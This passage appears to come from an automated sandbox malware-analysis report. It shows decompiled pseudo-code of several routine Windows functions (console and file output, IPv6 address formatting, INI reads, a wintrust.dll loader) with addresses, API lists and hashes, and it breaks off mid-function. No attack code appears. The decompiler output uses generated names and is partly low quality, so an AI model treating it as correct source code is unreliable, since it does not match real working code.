                                                        • Associated: 0000000D.00000002.688370384.0000000002420000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: _wcspbrk
                                                        • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                        • API String ID: 402402107-258546922
                                                        • Opcode ID: 19e859dc8b589d87901887121b493b833a8e86fedb9bc13b44f2ea7da033d69f
                                                        • Instruction ID: 6fb79d7e1d46d6f548134400af225bf760e0f7b52db59aacf58112c6940d21f7
                                                        • Opcode Fuzzy Hash: 19e859dc8b589d87901887121b493b833a8e86fedb9bc13b44f2ea7da033d69f
                                                        • Instruction Fuzzy Hash: 05F1E3B2D20209EFCF51DFD4C980AAEF7B9FB08304F55446AE605A7214E734AA45DF61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B81A03, Relevance: 18.2, APIs: 12, Instructions: 243filestringCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 95%
                                                        			E00B81A03(void* __ebx, int __ecx, void* __edx, void* __eflags, void* _a4, long _a8) {
				signed int _v8;
				char _v520;
				long _v524;
				void* _v528;
				long _v532;
				void* _v536;
				signed int _v540;
				int _v544;
				int _v552;
				void* _v556;
				intOrPtr _v564;
				char _v568;
				void* __edi;
				void* __esi;
				signed int _t76;
				long _t83;
				long _t87;
				int _t90;
				int _t92;
				int _t94;
				long _t95;
				int _t98;
				int _t101;
				long _t102;
				int _t103;
				long _t104;
				int _t105;
				int _t108;
				signed int _t109;
				signed int _t110;
				int _t111;
				long _t115;
				int _t117;
				void* _t118;
				int _t119;
				void* _t120;
				void* _t131;
				void* _t140;
				void* _t141;
				long _t142;
				signed int _t143;

				_t140 = __edx;
				_t118 = __ebx;
				_t76 =  *0xb97004; // 0xbb40e64e
				_v8 = _t76 ^ _t143;
				_t142 = _a8;
				_v544 = __ecx;
				_v536 = _a4;
				E00B81911( &_v568);
				E00B818B2( &_v556);
				_v540 = _v540 & 0x00000000;
				if(_t142 == 0) {
					_t142 = 0xb89acc;
				}
				_t141 = lstrlenW(_t142);
				_t83 = E00B81923( &_v568, _t142, _t142 + _t141 * 2);
				_v524 = _t83;
				if(_t83 < 0) {
					L22:
					E00B815A1( &_v556);
					__eflags = _v8 ^ _t143;
					return E00B81335(_v524, _t118, _v8 ^ _t143, _t140, _t141, _t142);
				} else {
					_t87 = E00B818C4( &_v556, _t141);
					_v524 = _t87;
					if(_t87 < 0) {
						goto L22;
					}
					_push(_t118);
					_t141 = 0;
					_t142 = 0xd;
					while(_v568 < _v564) {
						_t120 = E00B819CE( &_v568);
						if(_t120 == 0xa) {
							__eflags = _t141 - _t142;
							if(_t141 == _t142) {
								goto L6;
							}
							_v528 = _t142;
							_t117 = E00B81954( &_v556,  &_v528, 1);
							_v524 = _t117;
							__eflags = _t117;
							if(_t117 >= 0) {
								goto L6;
							}
							L21:
							_pop(_t118);
							goto L22;
						}
						L6:
						_v528 = _t120 & 0x0000ffff;
						_t115 = E00B81954( &_v556,  &_v528, 1);
						_v524 = _t115;
						if(_t115 < 0) {
							goto L21;
						}
						_t141 = _t120;
					}
					_v528 = _t142;
					_t90 = E00B81954( &_v556,  &_v528, 1);
					_v524 = _t90;
					__eflags = _t90;
					if(_t90 < 0) {
						goto L21;
					}
					_v528 = 0xa;
					_t92 = E00B81954( &_v556,  &_v528, 1);
					_v524 = _t92;
					__eflags = _t92;
					if(_t92 < 0) {
						goto L21;
					}
					__eflags =  *0xb97001;
					_t141 = _v556;
					_t119 = _v552;
					if( *0xb97001 == 0) {
						L13:
						_t142 = WideCharToMultiByte;
						_t94 = WideCharToMultiByte(1, 0, _t141, _t119, 0, 0, 0, 0);
						_v544 = _t94;
						__eflags = _t94;
						if(_t94 <= 0) {
							_t95 = GetLastError();
							L46:
							__eflags = _t95;
							if(_t95 > 0) {
								_t95 = _t95 & 0x0000ffff | 0x80070000;
								__eflags = _t95;
							}
							_v524 = _t95;
							goto L21;
						}
						__eflags = _t94 - 0x200;
						if(_t94 >= 0x200) {
							_t59 = _t94 + 1; // 0x1
							_t131 = _t59;
							__eflags = _t131 - _t94;
							if(_t131 < _t94) {
								_v524 = 0x8007000e;
								goto L21;
							}
							_push(_t131);
							L00B82877();
							_v540 = _t94;
							__eflags = _t94;
							if(_t94 == 0) {
								_v524 = 0x8007000e;
								L20:
								__eflags = _v540;
								if(_v540 != 0) {
									_push(_v540);
									L00B82082();
								}
								goto L21;
							}
							_v528 = _t94;
							_t94 = _v544;
							L16:
							_t142 = WideCharToMultiByte(1, 0, _t141, _t119, _v528, _t94, 0, 0);
							__eflags = _t142;
							if(__eflags == 0) {
								L38:
								_t98 = GetLastError();
								__eflags = _t98;
								if(_t98 > 0) {
									_t98 = _t98 & 0x0000ffff | 0x80070000;
									__eflags = _t98;
								}
								_v524 = _t98;
								goto L20;
							}
							if(__eflags <= 0) {
								goto L20;
							} else {
								goto L18;
							}
							while(1) {
								L18:
								_t101 = WriteFile(_v536, _v528, _t142,  &_v532, 0);
								__eflags = _t101;
								if(_t101 == 0) {
									goto L38;
								}
								_t102 = _v532;
								_v528 = _v528 + _t102;
								_t142 = _t142 - _t102;
								__eflags = _t142;
								if(_t142 != 0) {
									continue;
								}
								goto L20;
							}
							goto L38;
						}
						_v528 =  &_v520;
						goto L16;
					}
					_t103 = _v544;
					__eflags =  *((char*)(_t103 + 0x25));
					if( *((char*)(_t103 + 0x25)) != 0) {
						L26:
						__eflags = _t119;
						if(_t119 <= 0) {
							goto L21;
						}
						_t142 = GetLastError;
						while(1) {
							_t104 = 0x3fff;
							__eflags = _t119 - 0x3fff;
							if(_t119 <= 0x3fff) {
								_t104 = _t119;
							}
							_t105 = WriteConsoleW(_v536, _t141, _t104,  &_v532, 0);
							__eflags = _t105;
							if(_t105 == 0) {
								goto L40;
							}
							_t110 = _v532;
							_t141 = _t141 + _t110 * 2;
							_t119 = _t119 - _t110;
							__eflags = _t119;
							L32:
							__eflags = _t119;
							if(_t119 <= 0) {
								goto L21;
							}
							continue;
							L40:
							_t95 = GetLastError();
							__eflags = _t95 - 6;
							if(_t95 != 6) {
								goto L46;
							}
							__eflags = _t119;
							if(_t119 <= 0) {
								goto L21;
							} else {
								goto L42;
							}
							while(1) {
								L42:
								_t108 = WriteFile(_v536, _t141, _t119 + _t119,  &_v532, 0);
								__eflags = _t108;
								if(_t108 == 0) {
									break;
								}
								_v532 = _v532 >> 1;
								_t109 = _v532;
								_t119 = _t119 - _t109;
								__eflags = _t119;
								_t141 = _t141 + _t109 * 2;
								if(_t119 == 0) {
									goto L32;
								}
							}
							_t95 = GetLastError();
							goto L46;
						}
					}
					_t111 = E00B819AE(_v536);
					__eflags = _t111;
					if(_t111 != 0) {
						goto L26;
					}
					goto L13;
				}
			}












































                                                        0x00b81a03
                                                        0x00b81a03
                                                        0x00b81a0e
                                                        0x00b81a15
                                                        0x00b81a1c
                                                        0x00b81a1f
                                                        0x00b81a2c
                                                        0x00b81a32
                                                        0x00b81a3d
                                                        0x00b81a42
                                                        0x00b81a4b
                                                        0x00b8769a
                                                        0x00b8769a
                                                        0x00b81a58
                                                        0x00b81a65
                                                        0x00b81a6a
                                                        0x00b81a72
                                                        0x00b81c12
                                                        0x00b81c18
                                                        0x00b81c27
                                                        0x00b81c30
                                                        0x00b81a78
                                                        0x00b81a82
                                                        0x00b81a87
                                                        0x00b81a8f
                                                        0x00000000
                                                        0x00000000
                                                        0x00b81a95
                                                        0x00b81a98
                                                        0x00b81a9a
                                                        0x00b81a9b
                                                        0x00b81ab4
                                                        0x00b81ab9
                                                        0x00b82bc3
                                                        0x00b82bc5
                                                        0x00000000
                                                        0x00000000
                                                        0x00b82bda
                                                        0x00b82be0
                                                        0x00b82be5
                                                        0x00b82beb
                                                        0x00b82bed
                                                        0x00000000
                                                        0x00000000
                                                        0x00b81c11
                                                        0x00b81c11
                                                        0x00000000
                                                        0x00b81c11
                                                        0x00b81abf
                                                        0x00b81ac2
                                                        0x00b81ad7
                                                        0x00b81adc
                                                        0x00b81ae4
                                                        0x00000000
                                                        0x00000000
                                                        0x00b81aea
                                                        0x00b81aea
                                                        0x00b81afd
                                                        0x00b81b03
                                                        0x00b81b08
                                                        0x00b81b0e
                                                        0x00b81b10
                                                        0x00000000
                                                        0x00000000
                                                        0x00b81b25
                                                        0x00b81b2f
                                                        0x00b81b34
                                                        0x00b81b3a
                                                        0x00b81b3c
                                                        0x00000000
                                                        0x00000000
                                                        0x00b81b42
                                                        0x00b81b49
                                                        0x00b81b4f
                                                        0x00b81b55
                                                        0x00b81b7a
                                                        0x00b81b7a
                                                        0x00b81b8b
                                                        0x00b81b8d
                                                        0x00b81b93
                                                        0x00b81b95
                                                        0x00b87705
                                                        0x00b876ec
                                                        0x00b876ec
                                                        0x00b876ee
                                                        0x00b876f5
                                                        0x00b876f5
                                                        0x00b876f5
                                                        0x00b876fa
                                                        0x00000000
                                                        0x00b876fa
                                                        0x00b81b9b
                                                        0x00b81ba0
                                                        0x00b870c0
                                                        0x00b870c0
                                                        0x00b870c3
                                                        0x00b870c5
                                                        0x00b8770d
                                                        0x00000000
                                                        0x00b8770d
                                                        0x00b870cb
                                                        0x00b870cc
                                                        0x00b870d2
                                                        0x00b870d8
                                                        0x00b870da
                                                        0x00b8771c
                                                        0x00b81c04
                                                        0x00b81c04
                                                        0x00b81c0b
                                                        0x00b870f1
                                                        0x00b870f7
                                                        0x00b870fc
                                                        0x00000000
                                                        0x00b81c0b
                                                        0x00b870e0
                                                        0x00b870e6
                                                        0x00b81bb2
                                                        0x00b81bc4
                                                        0x00b81bc6
                                                        0x00b81bc8
                                                        0x00b87102
                                                        0x00b87102
                                                        0x00b8772b
                                                        0x00b8772d
                                                        0x00b87734
                                                        0x00b87734
                                                        0x00b87734
                                                        0x00b87739
                                                        0x00000000
                                                        0x00b87739
                                                        0x00b81bce
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b81bd0
                                                        0x00b81bd0
                                                        0x00b81be6
                                                        0x00b81bec
                                                        0x00b81bee
                                                        0x00000000
                                                        0x00000000
                                                        0x00b81bf4
                                                        0x00b81bfa
                                                        0x00b81c00
                                                        0x00b81c00
                                                        0x00b81c02
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b81c02
                                                        0x00000000
                                                        0x00b81bd0
                                                        0x00b81bac
                                                        0x00000000
                                                        0x00b81bac
                                                        0x00b81b57
                                                        0x00b81b5d
                                                        0x00b81b61
                                                        0x00b82de8
                                                        0x00b82de8
                                                        0x00b82dea
                                                        0x00000000
                                                        0x00000000
                                                        0x00b82df0
                                                        0x00b82df6
                                                        0x00b82df6
                                                        0x00b82dfb
                                                        0x00b82dfd
                                                        0x00b82dff
                                                        0x00b82dff
                                                        0x00b82e12
                                                        0x00b82e18
                                                        0x00b82e1a
                                                        0x00000000
                                                        0x00000000
                                                        0x00b82e20
                                                        0x00b82e26
                                                        0x00b82e29
                                                        0x00b82e29
                                                        0x00b82e2b
                                                        0x00b82e2b
                                                        0x00b82e2d
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b876a4
                                                        0x00b876a4
                                                        0x00b876a6
                                                        0x00b876a9
                                                        0x00000000
                                                        0x00000000
                                                        0x00b876ab
                                                        0x00b876ad
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b876b3
                                                        0x00b876b3
                                                        0x00b876c7
                                                        0x00b876cd
                                                        0x00b876cf
                                                        0x00000000
                                                        0x00000000
                                                        0x00b876d1
                                                        0x00b876d7
                                                        0x00b876dd
                                                        0x00b876dd
                                                        0x00b876df
                                                        0x00b876e2
                                                        0x00000000
                                                        0x00000000
                                                        0x00b876e8
                                                        0x00b876ea
                                                        0x00000000
                                                        0x00b876ea
                                                        0x00b82df6
                                                        0x00b81b6d
                                                        0x00b81b72
                                                        0x00b81b74
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b81b74

                                                        APIs
                                                        • lstrlenW.KERNEL32(?), ref: 00B81A52
                                                          • Part of subcall function 00B818C4: GetProcessHeap.KERNEL32(00000000,?), ref: 00B818E8
                                                          • Part of subcall function 00B818C4: HeapAlloc.KERNEL32(00000000), ref: 00B818EB
                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00B81B8B
                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,?,?,0000000A,00000000,00000000,00000000), ref: 00B81BC2
                                                        • WriteFile.KERNEL32(?,0000000A,00000000,?,00000000), ref: 00B81BE6
                                                          • Part of subcall function 00B81954: memcpy.MSVCRT ref: 00B8198B
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: ByteCharHeapMultiWide$AllocFileProcessWritelstrlenmemcpy
                                                        • String ID:
                                                        • API String ID: 4083229884-0
                                                        • Opcode ID: 7be91fc505eaeda0c570aeb76e9ebd98f73fae027e840905e6e1f1feafd7f50c
                                                        • Instruction ID: f76ab9c73d9fdeb2b53eb574bc06afc3b77a4bdf36adc4d7744516155ed44ab3
                                                        • Opcode Fuzzy Hash: 7be91fc505eaeda0c570aeb76e9ebd98f73fae027e840905e6e1f1feafd7f50c
                                                        • Instruction Fuzzy Hash: E591307198222A9ADB20AB68CC99BEA77FCEB14300F1045E5E419E6171EF74DEC5CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 023113CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 38%
                                                        			E023113CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E02307707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x22d2926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E02307707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x22d9cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E02307707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E02307707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E02307707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E02307707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                                                        0x023113d5
                                                        0x023113d9
                                                        0x023113dc
                                                        0x023113de
                                                        0x023113e1
                                                        0x023113e8
                                                        0x023113ee
                                                        0x0233e8fd
                                                        0x00000000
                                                        0x0233e921
                                                        0x0233e921
                                                        0x0233e928
                                                        0x0233e982
                                                        0x0233e98a
                                                        0x00000000
                                                        0x0233e99a
                                                        0x0233e99e
                                                        0x0233e9a3
                                                        0x0233e9a8
                                                        0x0233e9b9
                                                        0x0233e978
                                                        0x00000000
                                                        0x0233e978
                                                        0x0233e98a
                                                        0x0233e92a
                                                        0x0233e931
                                                        0x0233e944
                                                        0x0233e944
                                                        0x0233e950
                                                        0x0233e954
                                                        0x0233e959
                                                        0x0233e95e
                                                        0x0233e963
                                                        0x0233e970
                                                        0x00000000
                                                        0x0233e975
                                                        0x0233e93b
                                                        0x0233e980
                                                        0x00000000
                                                        0x0233e980
                                                        0x0233e942
                                                        0x0233e94b
                                                        0x00000000
                                                        0x0233e94b
                                                        0x00000000
                                                        0x0233e942
                                                        0x023113f4
                                                        0x023113f4
                                                        0x023113f9
                                                        0x023113fc
                                                        0x023113ff
                                                        0x02311406
                                                        0x0233e9cc
                                                        0x0233e9d2
                                                        0x0233e9d2
                                                        0x0233e9cc
                                                        0x0231140c
                                                        0x02311411
                                                        0x02311431
                                                        0x0231143a
                                                        0x0231143c
                                                        0x0231143f
                                                        0x0231143f
                                                        0x02311442
                                                        0x02311447
                                                        0x023114a8
                                                        0x023114ac
                                                        0x0233e9e2
                                                        0x0233e9e7
                                                        0x0233e9ec
                                                        0x0233ea05
                                                        0x0233ea05
                                                        0x00000000
                                                        0x02311449
                                                        0x00000000
                                                        0x02311449
                                                        0x0231144c
                                                        0x02311459
                                                        0x02311462
                                                        0x02311469
                                                        0x0231146a
                                                        0x02311470
                                                        0x02311473
                                                        0x02311476
                                                        0x02311476
                                                        0x02311490
                                                        0x02311495
                                                        0x0231138e
                                                        0x02311390
                                                        0x02311397
                                                        0x02311398
                                                        0x02311399
                                                        0x023113a1
                                                        0x023113a4
                                                        0x023113a4
                                                        0x02311498
                                                        0x0231149c
                                                        0x0231149f
                                                        0x023114a2
                                                        0x00000000
                                                        0x00000000
                                                        0x023114a4
                                                        0x00000000
                                                        0x023114a4
                                                        0x02311413
                                                        0x02311415
                                                        0x02311416
                                                        0x02311419
                                                        0x0231141c
                                                        0x02311422
                                                        0x023113b7
                                                        0x023113bc
                                                        0x023113bf
                                                        0x023113bf
                                                        0x023113c2
                                                        0x02311424
                                                        0x02311424
                                                        0x02311424
                                                        0x02311427
                                                        0x0231142b
                                                        0x0231142c
                                                        0x0231142c
                                                        0x0231142c
                                                        0x00000000
                                                        0x0231141c
                                                        0x02311411

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.688194486.00000000022C0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: true
                                                        • Associated: 0000000D.00000002.688187161.00000000022B0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688305042.00000000023A0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688312609.00000000023B0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688320304.00000000023B4000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688327822.00000000023B7000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688335301.00000000023C0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688370384.0000000002420000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                        • API String ID: 48624451-2108815105
                                                        • Opcode ID: e3bb70d6ad55c67787f5a6b72c4b0bd9bab3142ddc1cdd48fd90eac1a340fab3
                                                        • Instruction ID: 0f516fe00e73dc58641c5f7f6a3729cb7dfa4af35b607e178d182032a12f59d9
                                                        • Opcode Fuzzy Hash: e3bb70d6ad55c67787f5a6b72c4b0bd9bab3142ddc1cdd48fd90eac1a340fab3
                                                        • Instruction Fuzzy Hash: 2A6113B1E00655AADF38DF99C8909FEBBB6EF84700B14C52DF6DA47644D734A640CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B9391E, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 127COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 92%
                                                        			E00B9391E(void* __edx, short* _a4, short* _a8, short* _a12, int* _a16, int _a20) {
				signed int _v8;
				char* _v12;
				char* _v16;
				char* _v20;
				int _v24;
				void* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t31;
				int _t33;
				signed int _t36;
				int _t39;
				int _t42;
				int _t45;
				void* _t50;
				int _t51;
				void* _t52;
				signed int _t53;
				char* _t54;
				intOrPtr _t56;

				_t50 = __edx;
				_t31 =  *0xb97004; // 0xbb40e64e
				_v8 = _t31 ^ _t53;
				_t56 =  *0xb97001; // 0x0
				if(_t56 == 0) {
					_t52 = WideCharToMultiByte;
					_t51 = _t51 | 0xffffffff;
					_t33 = WideCharToMultiByte(0, 0, _a4, _t51, 0, 0, 0, 0);
					_v16 = _t33;
					if(_t33 != 0) {
						E00B8320B(_t33);
						_v20 = _t54;
						if(_t54 != 0) {
							if(WideCharToMultiByte(0, 0, _a4, _t51, _v20, _v16, 0, 0) == 0) {
								goto L3;
							}
							_t39 = WideCharToMultiByte(0, 0, _a8, _t51, 0, 0, 0, 0);
							_v12 = _t39;
							if(_t39 == 0) {
								goto L3;
							}
							E00B8320B(_t39);
							_v16 = _t54;
							if(_t54 == 0) {
								goto L6;
							}
							if(WideCharToMultiByte(0, 0, _a8, _t51, _v16, _v12, 0, 0) == 0) {
								goto L3;
							}
							_t42 = WideCharToMultiByte(0, 0, _a12, _t51, 0, 0, 0, 0);
							_v24 = _t42;
							if(_t42 == 0) {
								goto L3;
							}
							E00B8320B(_t42);
							_v12 = _t54;
							if(_t54 == 0) {
								goto L6;
							}
							if(WideCharToMultiByte(0, 0, _a12, _t51, _v12, _v24, 0, 0) == 0) {
								goto L3;
							}
							_t45 = GetPrivateProfileIntA(_v16, _v12, _a20, _v20);
							L15:
							 *_a16 = _t45;
							_t36 = 0;
							L16:
							return E00B81335(_t36, 0, _v8 ^ _t53, _t50, _t51, _t52);
						}
						L6:
						_t36 = 0x8007000e;
						goto L16;
					}
					L3:
					_t36 = GetLastError();
					if(_t36 > 0) {
						_t36 = _t36 & 0x0000ffff | 0x80070000;
					}
					goto L16;
				}
				_t45 = GetPrivateProfileIntW(_a8, _a12, _a20, _a4);
				goto L15;
			}
























                                                        0x00b9391e
                                                        0x00b93926
                                                        0x00b9392d
                                                        0x00b93935
                                                        0x00b9393b
                                                        0x00b93954
                                                        0x00b9395e
                                                        0x00b93967
                                                        0x00b93969
                                                        0x00b9396e
                                                        0x00b9398d
                                                        0x00b93992
                                                        0x00b93997
                                                        0x00b939b5
                                                        0x00000000
                                                        0x00000000
                                                        0x00b939c1
                                                        0x00b939c3
                                                        0x00b939c8
                                                        0x00000000
                                                        0x00000000
                                                        0x00b939ca
                                                        0x00b939cf
                                                        0x00b939d4
                                                        0x00000000
                                                        0x00000000
                                                        0x00b939e8
                                                        0x00000000
                                                        0x00000000
                                                        0x00b939f4
                                                        0x00b939f6
                                                        0x00b939fb
                                                        0x00000000
                                                        0x00000000
                                                        0x00b93a01
                                                        0x00b93a06
                                                        0x00b93a0b
                                                        0x00000000
                                                        0x00000000
                                                        0x00b93a1f
                                                        0x00000000
                                                        0x00000000
                                                        0x00b93a31
                                                        0x00b93a37
                                                        0x00b93a3a
                                                        0x00b93a3c
                                                        0x00b93a3e
                                                        0x00b93a4f
                                                        0x00b93a4f
                                                        0x00b93999
                                                        0x00b93999
                                                        0x00000000
                                                        0x00b93999
                                                        0x00b93970
                                                        0x00b93970
                                                        0x00b93978
                                                        0x00b93983
                                                        0x00b93983
                                                        0x00000000
                                                        0x00b93978
                                                        0x00b93949
                                                        0x00000000

                                                        APIs
                                                        • GetPrivateProfileIntW.KERNEL32 ref: 00B93949
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,Options,00000000,00000000,00000000,00000000,Options,?,00000000,?,?,00000104,?,?), ref: 00B93967
                                                        • GetLastError.KERNEL32 ref: 00B93970
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: ByteCharErrorLastMultiPrivateProfileWide
                                                        • String ID: Options
                                                        • API String ID: 1820523601-529056539
                                                        • Opcode ID: 8f8f257a885565d561ac1764da2acd200f70a5bc88851bf8b476f404a9cbbcd4
                                                        • Instruction ID: b782892be0b644d3ebdd949f1081809d5498b2ded4d4793a51c326cc5ae52ef3
                                                        • Opcode Fuzzy Hash: 8f8f257a885565d561ac1764da2acd200f70a5bc88851bf8b476f404a9cbbcd4
                                                        • Instruction Fuzzy Hash: 33312CB280114DBF9F11AFA18CC4EBF7EFDEB44788B104469F612A6160C6358E60DBB0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B910A1, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 148libraryloaderCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 73%
                                                        			E00B910A1(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				signed int _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				short _v18;
				short _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v60;
				char _v64;
				int _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v84;
				int _v88;
				int _v92;
				int _v96;
				char* _v100;
				intOrPtr _v104;
				int _v108;
				intOrPtr _v112;
				void _v124;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t55;
				intOrPtr _t63;
				signed int _t75;
				_Unknown_base(*)()* _t79;
				signed int _t80;
				signed int _t81;
				signed int _t84;
				signed int _t88;
				intOrPtr _t95;
				void* _t96;
				signed int _t97;
				intOrPtr _t98;
				int _t99;
				signed int _t102;

				_t95 = __edx;
				_t55 =  *0xb97004; // 0xbb40e64e
				_v8 = _t55 ^ _t102;
				_v72 = _a8;
				_v20 = 0xcd44;
				_t98 = __ecx;
				_v18 = 0x11d0;
				_t88 = 0xa;
				_t96 =  &_v64;
				memset(_t96, 0, _t88 << 2);
				_t97 = _t96 + _t88;
				_v76 = _t98;
				_v24 = 0xaac56b;
				_v16 = 0x8c;
				_v15 = 0xc2;
				_v14 = 0;
				_v13 = 0xc0;
				_v12 = 0x4f;
				_v11 = 0xc2;
				_v10 = 0x95;
				_v9 = 0xee;
				_v68 = 0;
				_v64 = 0x28;
				if(_v72 != 0) {
					_t97 =  &_v60;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t98 = _v76;
				}
				_t63 = _a4 + _a4;
				_v44 = _t95;
				_v40 = _t63;
				_v36 = 0xb89acc;
				if(_t98 != 0) {
					_v36 = _t98;
				}
				_v32 = _t63;
				_v28 = 0xb89acc;
				if(_t98 != 0) {
					_v28 = _t98;
				}
				_t99 = 0x30;
				memset( &_v124, 0, _t99);
				_v124 = _t99;
				_v108 = 0;
				_v96 = 0;
				_v92 = 0;
				_v88 = 0;
				_v104 = 3;
				_v112 = (0 | _a12 == 0x00000000) + 1;
				asm("sbb eax, eax");
				_v84 = ( ~_a12 & 0xffffff00) + 0x100;
				_v100 =  &_v64;
				_t75 = E00B855CA(0xb89acc, "wintrust.dll",  &_v68);
				_t100 = _t75;
				if(_t75 < 0) {
					L23:
